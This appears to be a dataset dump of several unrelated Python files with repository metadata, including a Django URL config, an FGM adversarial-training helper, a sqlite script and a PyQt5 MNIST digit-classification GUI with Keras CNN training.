plt.plot(x,ks_file['cumDiff'], label='cumDiff',marker='o')
plt.legend()
plt.title('KS')
plt.legend(loc='upper left')
datadotxy=tuple(zip((x+0.2),ks_file['cumDiff']))
for dotxy in datadotxy:
plt.annotate(str(round(dotxy[1],2)),xy=dotxy)
plt.xlabel(u"group", fontproperties='SimHei')
#plt.savefig("F:\moudle\modle\\KS.png",dpi=2000)
plt.show()
p = pd.DataFrame(model.predict_proba(X),index = X.index)
p['y'] = y
proba_y0 = np.array(p[p['y']==0][1])
proba_y1 = np.array(p[p['y']==1][1])
ks = stats.ks_2samp(proba_y0,proba_y1)[0]
print("K-S score %s"%str(ks))
if __name__ == "__main__":
pre_prob = pd.DataFrame(lr.predict_proba(X_test))
pre_prob['y'] = y_test.reset_index().iloc[:,-1]
ks_file = model_plot(pre_prob) | [
"FCY563991"
] | FCY563991 |
c98aa212d01c7daa0c18dcb80c0233eebd8e02bb | 8dfdebb981abbe02abbf178cfd68e76154ee183b | /tool.py | 5fcd3781ec32af2d9c64d328df46ee1734ce3698 | [] | no_license | valeriocos/busfactor | 1be45656cc7c24213f1a76b6f4a93d47c8e89ff5 | 13341dbbc6ab873c8b00e2a4c40a2dbebcac170b | refs/heads/master | 2020-12-25T16:25:36.773740 | 2017-07-11T16:03:25 | 2017-07-11T16:03:25 | 68,021,592 | 0 | 0 | null | 2016-09-12T15:25:51 | 2016-09-12T15:25:50 | null | UTF-8 | Python | false | false | 2,019 | py | __author__ = 'atlanmod'
import subprocess
import os
import signal
import sys
import time
import psutil
from selenium import webdriver
from bus_factor_gui import BusFactor
WEB_BROWSER_PATH = 'C:\chromedriver_win32\chromedriver.exe'
pro = None
gui = None
#if this value is false, the script will prompt the content of the data folder in a HTML page
execute_bus_factor = False
def is_process_running(pid):
found = False
for p in psutil.process_iter():
try:
if p.pid == pid:
found = True
break
except psutil.Error:
pass
return found
def start_server():
global pro
print "Starting server..."
cmd = 'python -m SimpleHTTPServer'
pro = subprocess.Popen(cmd, shell=True)
def close_browser(driver):
driver.close()
def start_gui():
global gui
gui = subprocess.Popen([sys.executable, "bus_factor_gui.py"] + ["-n", "True"])
def open_browser():
driver = webdriver.Chrome(executable_path=WEB_BROWSER_PATH)
driver.get("http://localhost:8000/index.html")
driver.refresh()
return driver
def shutdown_server():
print "Shutting down server..."
os.kill(pro.pid, signal.SIGTERM)
def delete_notification():
if os.path.exists(BusFactor.NOTIFICATION):
os.remove(BusFactor.NOTIFICATION)
def browser_is_open(driver):
open = True
try:
driver.current_url
except:
open = False
return open
def notified():
flag = False
if os.path.exists(BusFactor.NOTIFICATION):
flag = True
delete_notification()
return flag
def main():
delete_notification()
if execute_bus_factor:
start_gui()
while is_process_running(gui.pid):
time.sleep(10)
if notified():
break
start_server()
driver = open_browser()
open = True
while open:
time.sleep(1)
open = browser_is_open(driver)
shutdown_server()
if __name__ == "__main__":
main()
| [
"valerio.cosentino@gmail.com"
] | valerio.cosentino@gmail.com |
aca9efeda591797902aa1b2a8db77d2e97a960b3 | 38ccd54385a2bf7b8bdae0fc2c7a3f0c18388e93 | /src/app/urls.py | 4756a0c1b442c5c54f67b333acad1d32bc16d33b | [] | no_license | juzi198528/EndlessSummer | 35e35d4e50a445729a1a3e9be9a5abfe0258ee44 | 00104365b9d063ee1638fc292e6779e77e83a8d7 | refs/heads/master | 2021-01-10T09:34:58.210939 | 2015-07-02T14:23:28 | 2015-07-02T14:23:28 | 36,563,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 865 | py | from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'^login$', 'app.views.login'),
url(r'^logout$', 'app.views.logout'),
url(r'^doLogin', 'app.views.doLogin'),
url(r'^$', 'app.views.index'),
url(r'^parts/index$', 'parts.views.index'),
url(r'^parts/loadAll', 'parts.views.loadAll'),
url(r'^parts/search', 'parts.views.search'),
url(r'^parts/consume$', 'parts.views.consume'),
url(r'^parts/consume/search', 'parts.views.consumeSearch'),
url(r'^parts/consume/loadAll', 'parts.views.consumeLoadAll'),
url(r'^parts/incoming$', 'parts.views.incoming'),
url(r'^parts/incoming/search', 'parts.views.incomingSearch'),
url(r'^parts/incoming/loadAll', 'parts.views.incomingLoadAll'),
)
| [
"Administrator@WIN-8GRLM60SKUV"
] | Administrator@WIN-8GRLM60SKUV |
a52454850b304a36ed7bdc5226f5e936ea6652f3 | e76c6f7b95a0f21eb4b824e4edeadd79295b1929 | /classification_by_bert/model/FGM.py | 24450b883327cabb16cf3f5f06495641afc80c27 | [] | no_license | WuDiDaBinGe/DAGUAN2021_PretrainedModelTextClasssifier | 5ff5c21ae469d7b9cb531d0cf326472f1ee8e000 | 5c160ce6328ad0d0f0439c6d495bfea1ef96a2d1 | refs/heads/main | 2023-08-01T09:14:44.745205 | 2021-09-18T14:12:11 | 2021-09-18T14:12:11 | 397,621,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 984 | py | # -*- coding: utf-8 -*-
# @Time : 2021/9/8 下午2:54
# @Author : WuDiDaBinGe
# @FileName: FGM.py
# @Software: PyCharm
import torch
class FGM():
def __init__(self, model):
super(FGM, self).__init__()
self.model = model
self.backup = {}
def attack(self, epsilon=1., emb_name='word_embeddings'):
for name, param in self.model.named_parameters():
if param.requires_grad and emb_name in name:
self.backup[name] = param.data.clone()
norm = torch.norm(param.grad)
if norm != 0 and not torch.isnan(norm):
r_at = epsilon * param.grad / norm
param.data.add_(r_at)
def restore(self, emb_name='word_embeddings'):
for name, param in self.model.named_parameters():
if param.requires_grad and emb_name in name:
assert name in self.backup
param.data = self.backup[name]
self.backup = {}
| [
"1151680016@qq.com"
] | 1151680016@qq.com |
53be767ec0af9da1b6e57546b948c92ff061651d | c5b863c2e6a13111af6bb0eb6fd400eab668c194 | /BANCO-DE-DADOS/tamanho.py | b248f912d0dce724b341865c84ecdb3492ef0f51 | [] | no_license | Demerson-Demy/Ceunsp-ProjetoADS | b5bfc461cc34769a62fe06f6e51f4f9e0fca1846 | a58018e12c8a4c7088575df3003efb0ea89a5054 | refs/heads/main | 2023-07-18T11:24:07.237857 | 2021-09-09T01:07:19 | 2021-09-09T01:07:19 | 393,188,629 | 0 | 0 | null | 2021-08-05T22:54:27 | 2021-08-05T22:54:27 | null | UTF-8 | Python | false | false | 389 | py | import sqlite3
conector = sqlite3.connect("vendas1.db")
cursor = conector.cursor()
# TABELA Marca
cursor.execute("""
CREATE TABLE Tamanho (
Marca VARCHAR (3) NOT NULL PRIMARY KEY,
Tamanho INTEGER NOT NULL
);
""")
conector.commit()
cursor.close()
conector.close()
print("Abra a pasta do programa e veja se o arquivo esta lá")
print("Fim do Programa")
| [
"matheussabatine1717@gmail.com"
] | matheussabatine1717@gmail.com |
e95f81c2edaab21bbe2f5f9e621eae62b13fdc86 | 9f1039075cc611198a988034429afed6ec6d7408 | /tensorflow-stubs/_api/v1/keras/datasets/cifar10/__init__.pyi | f00ca8b56bea50c2b28c37c450e8e377366f9b62 | [] | no_license | matangover/tensorflow-stubs | 9422fbb1cb3a3638958d621461291c315f9c6ec2 | 664bd995ef24f05ba2b3867d979d23ee845cb652 | refs/heads/master | 2020-05-23T12:03:40.996675 | 2019-05-15T06:21:43 | 2019-05-15T06:21:43 | 186,748,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | pyi | # Stubs for tensorflow._api.v1.keras.datasets.cifar10 (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from tensorflow.python.keras.datasets.cifar10 import load_data as load_data
| [
"matangover@gmail.com"
] | matangover@gmail.com |
c70df226052d8f417c68f5042c2658c51fd492ef | 77abb9d33eedb68da3cb07db5c9cde94f24c7316 | /apps/transcripts/migrations/0006_mission_wiki.py | d43d37b12afd71a36046769b86770e971e2c1126 | [] | no_license | Spacelog/kallisto | 81aa62341c6d2925077fddae55fcf4280a74fed7 | f9644a304b98b358144a39cd7e6eba4f2e01c10e | refs/heads/master | 2020-12-29T02:19:50.069589 | 2017-04-15T18:55:08 | 2017-04-15T18:56:26 | 28,003,946 | 6 | 4 | null | 2016-02-17T08:18:27 | 2014-12-14T18:44:01 | Python | UTF-8 | Python | false | false | 489 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('transcripts', '0005_mission_active'),
]
operations = [
migrations.AddField(
model_name='mission',
name='wiki',
field=models.URLField(help_text='URL of wiki page for useful notes.', null=True, blank=True),
preserve_default=True,
),
]
| [
"james@tartarus.org"
] | james@tartarus.org |
913fca80ba4ca3f8ecb38be59cd12e79ec3b9624 | 92c4fa8ea5ed8447da2c6104960f8a8da8cd03ec | /build/lib/accounting/accounting/doctype/sales_invoice/test_sales_invoice.py | a23b48a9ff041d6ace9aef685c0ebeca84e092d3 | [
"MIT"
] | permissive | mincerray1/accounting | 9c4f69b8e4e6f20bb7563d3cbf1fd4e2907d8d77 | 74867a71918a99500fb78c75652841bcb8e509a1 | refs/heads/master | 2023-03-20T19:01:53.271813 | 2021-01-14T16:01:17 | 2021-01-14T16:01:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 211 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2020, Shariq and Contributors
# See license.txt
from __future__ import unicode_literals
# import frappe
import unittest
class TestSalesInvoice(unittest.TestCase):
pass
| [
"sharique.rik@gmail.com"
] | sharique.rik@gmail.com |
1ff7a39ec3597863b3679337588d619360ca90e2 | 45057b4f2c48746258ac45e21e1e0fb74c990ee0 | /hw1/p4_utils.py | 43913e1e8f39f1a272b51669bb2a394ea5aa79f6 | [] | no_license | WingConghyc/ECE276B | cd6c2f35918c3d8fc1ac9d442efb48c138bcb2e2 | ecd8803c7ca7c1f250bfaf5754474b418f9bda65 | refs/heads/master | 2022-01-07T14:51:02.623422 | 2019-06-16T06:32:12 | 2019-06-16T06:32:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,079 | py | import numpy as np
import sys
import os.path
def load_data(input_file):
'''
Read deterministic shortest path specification
'''
with np.load(input_file) as data:
n = data["number_of_nodes"]
s = data["start_node"]
t = data["goal_node"]
C = data["cost_matrix"]
return n, s, t, C
def plot_graph(C,path_nodes,output_file):
'''
Plot a graph with edge weights sepcified in matrix C.
Saves the output to output_file.
'''
from graphviz import Digraph
G = Digraph(filename=output_file, format='png', engine='neato')
G.attr('node', colorscheme='accent3', color='1', shape='oval', style="filled", label="")
# Normalize the edge weights to [1,11] to fit the colorscheme
maxC = np.max(C[np.isfinite(C)])
minC = np.min(C)
norC = 10*np.nan_to_num((C-minC)/(maxC-minC))+1
# Add edges with non-infinite cost to the graph
for i in range(C.shape[0]):
for j in range(C.shape[1]):
if C[i,j] < np.inf:
G.edge(str(i), str(j), colorscheme="rdylbu11", color="{:d}".format(int(norC[i,j])))
# Display path
for n in path_nodes:
G.node(str(n), colorscheme='accent3', color='3', shape='oval', style="filled", label=str(n))
G.view()
def save_results(path, cost, output_file):
'''
write the path and cost arrays to a text file
'''
with open(output_file, 'w') as fp:
for i in range(len(path)):
fp.write('%d ' % path[i])
fp.write('\n')
for i in range(len(cost)):
fp.write('%.2f ' % cost[i])
if __name__=="__main__":
#input_file = sys.argv[1]
input_file = './data/problem1.npz'
file_name = os.path.splitext(input_file)[0]
# Load data
n,s,t,C = load_data(input_file)
# C = np.fill_diagonal(C, 0)
# Generate results
path = np.array([42,43,44,53,61,70,79,80,81,82,83,84,85,86,87,98,109])
cost = np.array([16.0,15.0,14.0,13.0,12.0,11.0,10.0,9.0,8.0,7.0,6.0,5.0,4.,3.0,2.0,1.0,0.0])
# Visualize (requires: pip install graphviz --user)
plot_graph(C,path,file_name)
# Save the results
save_results(path,cost,file_name+"_results.txt")
| [
"arthas960426@gmail.com"
] | arthas960426@gmail.com |
dff218f2d3e619dc6787100c4a5e2b2bd86f8b49 | 3b048e8b62b36b039528fc636dcbee1124c8cb20 | /PyQt5 ile Rakam Sınıflandırma(Digit Classification GUI Projesi)/digit_classification_project_w_pyqt5.py | afdeee4b6bd928749f6993a6fe1ae01bd79cf35d | [] | no_license | rabia-koc/Python_GUI | c39b36ef6eaa11df91bb1638569bb30d147e074b | efe4b1e09777195e92e19ad316550c0de146e56c | refs/heads/main | 2023-04-10T12:21:36.961200 | 2021-04-09T18:51:16 | 2021-04-09T18:51:16 | 356,365,607 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,398 | py | # libraries
from PyQt5.QtWidgets import *
from PyQt5.QtGui import QIcon, QPixmap, QImage, QPainter, QPen # icon and load image
from PyQt5.QtCore import Qt, QPoint
import sys
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg # load image
import cv2 # open-cv use for image resize
## Convolutional Neural Network
import keras
from keras.datasets import mnist # keras kütüphanesi içinde bulunan mnist veri setini kullanmak için
from keras.models import Sequential, load_model
from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D # CNN için
#%% preprocess
# --- Load and preprocess the MNIST dataset ---
# mnist.load_data() returns two (images, labels) tuples:
# 60,000 training images and 10,000 test images of handwritten digits 0-9.
(x_train, y_train),(x_test, y_test) = mnist.load_data()
# Sanity check: display one training sample together with its label
# (index 55 happens to be an "8").
plt.figure()
i = 55
plt.imshow(x_train[i], cmap = "gray")  # each sample is a 28x28 grayscale image
print("Label: ",y_train[i])
plt.axis("off")  # hide the axes, we only want the picture
plt.grid(False)  # remove grid lines from the plot
# Keras CNN layers expect input of shape (n_samples, rows, cols, channels);
# channels = 1 because these images are single-channel grayscale.
img_rows = 28
img_cols = 28
x_train = x_train.reshape( x_train.shape[0],img_rows,img_cols,1)
x_test = x_test.reshape( x_test.shape[0],img_rows,img_cols,1)
input_shape = (img_rows,img_cols,1)  # per-sample shape passed to the first layer
# Normalization: squeeze every pixel into [0, 1] by dividing by 255
# (the uint8 maximum). Inputs on a common scale speed up training.
x_train = x_train.astype("float32")  # cast first so the division keeps precision
x_test = x_test.astype("float32")
x_train /= 255  # i.e. x_train = x_train/255
x_test /= 255
# One-hot encode the labels: 10 classes (digits 0-9), so each label becomes
# a length-10 binary vector, as required by categorical_crossentropy.
num_classes = 10
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
# %% CNN
# Train two CNNs that differ only in the number of filters/neurons per layer,
# evaluate each on the held-out test set, and save both to disk.
model_list = []   # trained models are collected here
score_list = []   # [loss, accuracy] of each model on the test set
batch_size = 256
epochs = 5
# Filter counts per layer: row 0 -> model1 (16,32,64), row 1 -> model2 (8,16,32).
filter_numbers = np.array([[16,32,64], [8,16,32]])
# one iteration per model
for i in range(2):
    print(filter_numbers[i])  # show which filter configuration is being trained
    model = Sequential()
    # Feature extraction: two 3x3 convolutions; only the first layer needs
    # input_shape, subsequent layers infer it from the previous layer's output.
    model.add(Conv2D(filter_numbers[i,0], kernel_size = (3,3), activation = "relu", input_shape = input_shape))
    model.add(Conv2D(filter_numbers[i,1], kernel_size = (3,3), activation = "relu"))
    model.add(MaxPooling2D(pool_size = (2,2)))
    model.add(Dropout(0.25))  # randomly disable 25% of units to reduce overfitting
    # Classification head: flatten the feature maps into a vector.
    model.add(Flatten())
    model.add(Dense(filter_numbers[i,2], activation = "relu"))
    model.add(Dropout(0.5))
    # Output layer: one neuron per digit class; softmax because there are
    # more than two classes.
    model.add(Dense(num_classes, activation = "softmax"))
    model.compile(loss = keras.losses.categorical_crossentropy, optimizer = keras.optimizers.Adadelta(),
                  metrics = ["accuracy"])
    # verbose = 1 prints per-epoch progress to the console while training.
    history = model.fit(x_train, y_train, batch_size = batch_size, epochs = epochs, verbose = 1, validation_data = (x_test, y_test))
    # Evaluate on images the network has never seen.
    score = model.evaluate(x_test, y_test, verbose = 0)
    print("Model {} Test Loss: {}".format(i+1, score[0]))
    print("Model {} Test Accuracy: {}".format(i+1, score[1]))
    model_list.append(model)   # keep the trained model
    score_list.append(score)   # keep its evaluation scores
    model.save("model" + str(i+1) + ".h5")  # persist as model1.h5 / model2.h5
# model1: 3 layers -> 16, 32, 64 filters/neurons
# model2: 3 layers -> 8, 16, 32 filters/neurons
# %% reload the saved models from disk
model1 = load_model("model1.h5")
model2 = load_model("model2.h5")
#%% Canvas
# sınıflandırmak istediğimiz sayıyı draw canvas methodunu kullanarak arayüze çizmiş olucaz.
class Canvas(QMainWindow):
    """A small window the user can draw a digit on with the mouse.

    The drawing is kept in a QImage (white strokes on a black background).
    Pressing "Ok!" converts the image to a numpy array, saves it as
    "input_img.png" for the classifier, and closes the window.
    """

    def __init__(self):
        super().__init__()
        self.width = 400
        self.height = 400
        self.setWindowTitle("Draw Digit App")
        self.setGeometry(50, 100, self.width, self.height)
        # Backing image the user draws on; start with an all-black canvas
        # so untouched pixels are 0 after normalization.
        self.image = QImage(self.size(), QImage.Format_RGB32)
        self.image.fill(Qt.black)
        self.lastPoint = QPoint()  # last mouse position while drawing
        self.drawing = False       # True only while the left button is held down
        # numpy copy of the canvas, filled in when "Ok!" is pressed
        self.im_np = np.zeros([self.width, self.height])
        # "Ok!" button: confirm the drawing and save it for classification.
        button1 = QPushButton("Ok!", self)
        button1.move(2, 2)
        button1.clicked.connect(self.enterFunction)
        self.show()

    def paintEvent(self, event):
        """Repaint the window from the backing QImage."""
        canvasPainter = QPainter(self)
        canvasPainter.drawImage(self.rect(), self.image, self.image.rect())

    def enterFunction(self):
        """Dump the canvas to a numpy array and save it as input_img.png."""
        # Expose the raw image bytes as a (width, height, 4) RGBA array.
        ptr = self.image.constBits()
        ptr.setsize(self.image.byteCount())
        self.im_np = np.array(ptr).reshape(self.width, self.height, 4)
        # Keep a single channel (strokes are pure white, so channels agree)
        # and normalize to [0, 1] to match the network's training data.
        self.im_np = self.im_np[:, :, 0]
        self.im_np = self.im_np / 255.0
        if np.sum(self.im_np) == 0:
            # All-black canvas: nothing was drawn, keep the window open.
            print("Please write a digit")
        else:
            # Save the drawing so it can be reloaded and classified later.
            plt.figure(figsize = (1, 1), dpi = 200)
            plt.imshow(self.im_np, cmap = "gray")
            plt.axis("off")
            plt.grid(False)
            plt.savefig("input_img.png")
            self.close()

    def mousePressEvent(self, event):
        """Start a stroke where the left button was pressed."""
        if event.button() == Qt.LeftButton:
            self.lastPoint = event.pos()
            self.drawing = True
            print(self.lastPoint)

    def mouseMoveEvent(self, event):
        """While the left button is held, extend the stroke to the cursor."""
        if (event.buttons() == Qt.LeftButton) & self.drawing:
            painter = QPainter(self.image)
            # thick white round-capped pen so the digit resembles MNIST strokes
            painter.setPen(QPen(Qt.white, 20, Qt.SolidLine, Qt.RoundCap, Qt.RoundJoin))
            painter.drawLine(self.lastPoint, event.pos())
            self.lastPoint = event.pos()
            self.update()  # trigger paintEvent so the new segment is shown

    def mouseReleaseEvent(self, event):
        """Finish the stroke when the left button is released."""
        # BUG FIX: the original compared the bound method `event.button`
        # (never equal to Qt.LeftButton), so `drawing` was never reset.
        if event.button() == Qt.LeftButton:
            self.drawing = False
#%% GUI
class Window(QMainWindow):
    def __init__(self):
        """Build the main application window: geometry, icon, tabs, widgets."""
        super().__init__()
        # main window geometry
        self.width = 1080   # window width in pixels
        self.height = 640   # window height in pixels
        self.setWindowTitle("Digit Classification")
        self.setGeometry(50, 100, self.width, self.height)
        self.setWindowIcon(QIcon("icon1.png"))  # title-bar icon for the app
        self.create_canvas = Canvas()  # drawing window defined above; Canvas.__init__ shows it immediately
        self.tabWidget()  # build the tab container
        self.widgets()    # build all widgets
        self.layouts()    # arrange them (defined further down in the file)
        self.show()
# 2 tane tabımız var, classification tabı içinde tüm olay gerçekleşiyor.
# parametre tabı içinde nöral networkte kullandığım parametreleri gösterdiğim kısım olucak.
# 1 tane ana tabs widget'im olucak, bunun altına 2 tane tab ekliyeceğim
def tabWidget(self):
self.tabs = QTabWidget()
self.setCentralWidget(self.tabs)
self.tab1 = QWidget()
self.tab2 = QWidget()
self.tabs.addTab(self.tab1, "Classification")
self.tabs.addTab(self.tab2, "Parameters")
# classification tabı üzerinde input img, settings, output, result olmak üzere 4 tane layout var.
    def widgets(self):
        """Create every widget used on the Classification and Parameters tabs.

        The Classification tab is split into four regions (input image,
        settings, output, result table); the Parameters tab lists the
        hyper-parameters of each trained model.
        """
        # tab1 left: two buttons, two labels, one line edit
        self.drawCanvas = QPushButton("Draw Canvas")
        # opens the Canvas window so the user can draw a digit
        self.drawCanvas.clicked.connect(self.drawCanvasFunction)
        self.openCanvas = QPushButton("Open Canvas")
        self.openCanvas.clicked.connect(self.openCanvasFunction)
        # label holding the drawn digit's image once it is loaded
        self.inputImage = QLabel(self)
        self.inputImage.setPixmap(QPixmap("input.png"))
        # the user types which digit was actually drawn (used when saving results)
        self.searchText = QLabel("Real number: ")
        self.searchEntry = QLineEdit()
        self.searchEntry.setPlaceholderText("Which number do you write?")
        # tab1 left middle: combobox, label, slider, checkbox, button
        self.methodSelection = QComboBox(self)
        self.methodSelection.addItems(["model1","model2"])  # which trained CNN to use
        # noise percentage display; starts at 0 (no noise)
        self.noiseText = QLabel("Add Noise: % " + "0")
        self.noiseSlider = QSlider(Qt.Horizontal)  # pick the noise level
        self.noiseSlider.setMinimum(0)
        self.noiseSlider.setMaximum(100)
        self.noiseSlider.setTickPosition(QSlider.TicksBelow)  # tick marks below the slider
        self.noiseSlider.setTickInterval(1)
        # keep the noise label in sync with the slider value
        self.noiseSlider.valueChanged.connect(self.noiseSliderFunction)
        # when checked, prediction results are saved
        self.remember = QCheckBox("Save Result", self)
        self.predict = QPushButton("Predict")
        self.predict.clicked.connect(self.predictionFunction)
        # tab1 right middle: image label + centered text label for the prediction
        self.outputImage = QLabel(self)
        self.outputImage.setPixmap(QPixmap("icon1.png"))
        self.outputLabel = QLabel("", self)
        self.outputLabel.setAlignment(Qt.AlignCenter)
        # tab1 right: 10-row table, one row per digit class, with the
        # probability that the drawn image belongs to that class
        self.resultTable = QTableWidget()
        self.resultTable.setColumnCount(2)
        self.resultTable.setRowCount(10)
        self.resultTable.setHorizontalHeaderItem(0, QTableWidgetItem("Label(Class)"))
        self.resultTable.setHorizontalHeaderItem(1, QTableWidgetItem("Probability"))
        # tab2 method1: hyper-parameters used to train model1
        self.parameter_list1 = QListWidget(self)
        self.parameter_list1.addItems(["batch_size = 256","epochs = 5","img_rows = 28",
                                       "img_cols = 28","Filter # = [16,32,64]","Activation Function = Relu",
                                       "loss = categorical cross entropy",
                                       "optimizer = Adadelta","metrics = accuracy"])
        # tab2 method2: hyper-parameters used to train model2
        self.parameter_list2 = QListWidget(self)
        self.parameter_list2.addItems(["batch_size = 256","epochs = 5","img_rows = 28",
                                       "img_cols = 28","Filter # = [8,16,32]","Activation Function = Relu",
                                       "loss = categorical cross entropy",
                                       "optimizer = Adadelta","metrics = accuracy"])
# sınıflandırma aşaması
# gerçekte ne çizdiğimizi real number kısmına yazıyoruz çünkü resultları kaydederken kullanıcaz.
    def predictionFunction(self):
        """Classify the drawn digit with the selected CNN model and show the result.

        Reads the ground-truth digit from the entry box, loads the chosen Keras
        model, optionally adds noise to the drawn image, runs the prediction,
        optionally appends a summary to Output.txt, and updates the output
        image, the output label and the probability table.
        """
        save_string = "" # accumulates the values to be written to Output.txt
        real_entry = self.searchEntry.text()
        save_string = save_string + " real entry: " + str(real_entry) + ", "
        # CNN model selection
        # pick the model file based on the combo-box choice
        model_name = self.methodSelection.currentText()
        # NOTE(review): if neither name matches, `model` stays unbound and the
        # predict call below raises NameError — confirm the combo box can only
        # hold "model1"/"model2".
        if model_name == "model1":
            model = load_model("model1.h5")
        elif model_name == "model2":
            model = load_model("model2.h5")
        else:
            print("Error")
        # record the chosen model in the save string
        save_string = save_string + "model name: " + str(model_name) + ", "
        # read the noise percentage from the slider (used to corrupt the image)
        noise_val = self.noiseSlider.value() # current slider value
        # a non-zero slider value requests random noise
        if noise_val != 0:
            noise_array = np.random.randint(0, noise_val, (28, 28))/100
            # random integers in [0, noise_val) as a 28x28 matrix,
            # divided by 100 to squeeze the noise into the 0..1 range
        else:
            noise_array = np.zeros([28, 28]) # no noise requested
        save_string = save_string + "noise value: " + str(noise_val) + ", "
        print(save_string)
        # load image as numpy
        # crop the canvas PNG manually because the widget adds an offset;
        # without the crop the 0..26 pixel border is blank
        img_array = mpimg.imread("input_img.png")[26:175, 26:175, 0]
        # downscale the drawing to the 28x28 input size the CNN expects
        resized_img_array = cv2.resize(img_array, dsize=(28, 28), interpolation = cv2.INTER_CUBIC)
        # add noise
        resized_img_array = resized_img_array + noise_array
        # visualise the noisy, resized image
        plt.imshow(resized_img_array, cmap = "gray")
        plt.title("image after adding noise and resize")
        # predict
        # reshape to (batch, height, width, channels) before prediction
        result = model.predict(resized_img_array.reshape(1, 28, 28, 1))
        QMessageBox.information(self,"Information","Classification is completed.")
        predicted_class = np.argmax(result) # class with the highest probability
        print("Prediction: ", predicted_class)
        save_string = save_string + "Predicted class: " + str(predicted_class)
        # save the result only if the "remember" checkbox is ticked
        if self.remember.isChecked():
            text_file = open("Output.txt","w")
            text_file.write(save_string)
            text_file.close()
        else:
            print("not save")
        # show the predicted digit as an image on the output panel
        self.outputImage.setPixmap(QPixmap("images\\" + str(predicted_class) + ".png"))
        # write the real vs. predicted digits on the output label
        self.outputLabel.setText("Real: " + str(real_entry) + " and Predicted: " + str(predicted_class))
        # fill the result table: column 0 = class label, column 1 = probability
        for row in range(10):
            self.resultTable.setItem(row, 0, QTableWidgetItem(str(row)))
            self.resultTable.setItem(row, 1, QTableWidgetItem(str(np.round(result[0][row], 5))))
            # probabilities rounded to 5 decimal places
    # To display the drawing surface we need a canvas object,
    # which is provided by a separately implemented canvas class.
    def drawCanvasFunction(self):
        """Show the drawing canvas when the Draw button is pressed."""
        self.create_canvas.show() # the canvas becomes visible on the button press
    def openCanvasFunction(self):
        """Load the saved drawing (input_img.png) into the input-image label."""
        self.inputImage.setPixmap(QPixmap("input_img.png")) # replaces the placeholder with the user's drawing
def noiseSliderFunction(self):
val = self.noiseSlider.value() # slider değerini okuyoruz ve val içierisine yazıyoruz.
self.noiseText.setText("Add Noise: % " + str(val)) # orada bulunan labeli set ediyoruz. Bu sefer 0 yerinde kendi sliderimde olan değeri seçicem.
    # Page-layout notes:
    # - every control on a tab is a widget; widgets live on form layouts
    # - the "left" form layout holds the Input Image group box
    # - each group box owns its own layout; the tab widgets
    #   (Classification, Parameters) sit on the main horizontal layout
    def layouts(self):
        """Assemble the group boxes and layouts for both tabs."""
        # tab1 layout: four form layouts placed side by side on a horizontal box
        self.mainLayout = QHBoxLayout()
        self.leftLayout = QFormLayout()
        self.leftMiddleLayout = QFormLayout()
        self.rightMiddleLayout = QFormLayout()
        self.rightLayout = QFormLayout()
        # left panel: canvas buttons, input image and the "real number" entry
        self.leftLayoutGroupBox = QGroupBox("Input Image") # outermost container of the left panel
        self.leftLayout.addRow(self.drawCanvas)
        self.leftLayout.addRow(self.openCanvas)
        self.leftLayout.addRow(self.inputImage)
        self.leftLayout.addRow(self.searchText)
        self.leftLayout.addRow(self.searchEntry)
        self.leftLayoutGroupBox.setLayout(self.leftLayout) # attach the form layout to its group box
        # left-middle panel: model choice, noise slider, save checkbox, predict button
        self.leftMiddleLayoutGroupBox = QGroupBox("Settings")
        self.leftMiddleLayout.addRow(self.methodSelection)
        self.leftMiddleLayout.addRow(self.noiseText)
        self.leftMiddleLayout.addRow(self.noiseSlider)
        self.leftMiddleLayout.addRow(self.remember)
        self.leftMiddleLayout.addRow(self.predict)
        self.leftMiddleLayoutGroupBox.setLayout(self.leftMiddleLayout)
        # right-middle panel: predicted digit image and the Real/Predicted label
        self.rightMiddleLayoutGroupBox = QGroupBox("Output")
        self.rightMiddleLayout.addRow(self.outputImage)
        self.rightMiddleLayout.addRow(self.outputLabel)
        self.rightMiddleLayoutGroupBox.setLayout(self.rightMiddleLayout)
        # right panel: the class/probability table
        self.rightLayoutGroupBox = QGroupBox("Result")
        self.rightLayout.addRow(self.resultTable)
        self.rightLayoutGroupBox.setLayout(self.rightLayout)
        # add the tab1 panels to the main layout
        self.mainLayout.addWidget(self.leftLayoutGroupBox, 25) # the last argument is the stretch (share of the width)
        self.mainLayout.addWidget(self.leftMiddleLayoutGroupBox, 25)
        self.mainLayout.addWidget(self.rightMiddleLayoutGroupBox, 25)
        self.mainLayout.addWidget(self.rightLayoutGroupBox, 25)
        self.tab1.setLayout(self.mainLayout) # install the main layout on tab1
        # tab2 layout: two parameter lists side by side
        self.tab2Layout = QHBoxLayout()
        self.tab2Method1Layout = QFormLayout()
        self.tab2Method2Layout = QFormLayout()
        # tab2 Method1 Layout
        self.tab2Method1LayoutGroupBox = QGroupBox("Method1")
        self.tab2Method1Layout.addRow(self.parameter_list1)
        self.tab2Method1LayoutGroupBox.setLayout(self.tab2Method1Layout)
        # tab2 Method2 Layout
        self.tab2Method2LayoutGroupBox = QGroupBox("Method2")
        self.tab2Method2Layout.addRow(self.parameter_list2)
        self.tab2Method2LayoutGroupBox.setLayout(self.tab2Method2Layout)
        # add the tab2 panels to tab2's layout
        self.tab2Layout.addWidget(self.tab2Method1LayoutGroupBox, 50)
        self.tab2Layout.addWidget(self.tab2Method2LayoutGroupBox, 50)
        self.tab2.setLayout(self.tab2Layout) # install the layout on tab2
# Application entry point: create the Qt application, show the main window,
# and hand control to the Qt event loop until the user quits.
# NOTE(review): consider guarding this with `if __name__ == "__main__":` so the
# module can be imported without launching the GUI.
app = QApplication(sys.argv)
window = Window()
window.show()
sys.exit(app.exec())
| [
"rabia8940@gmail.com"
] | rabia8940@gmail.com |
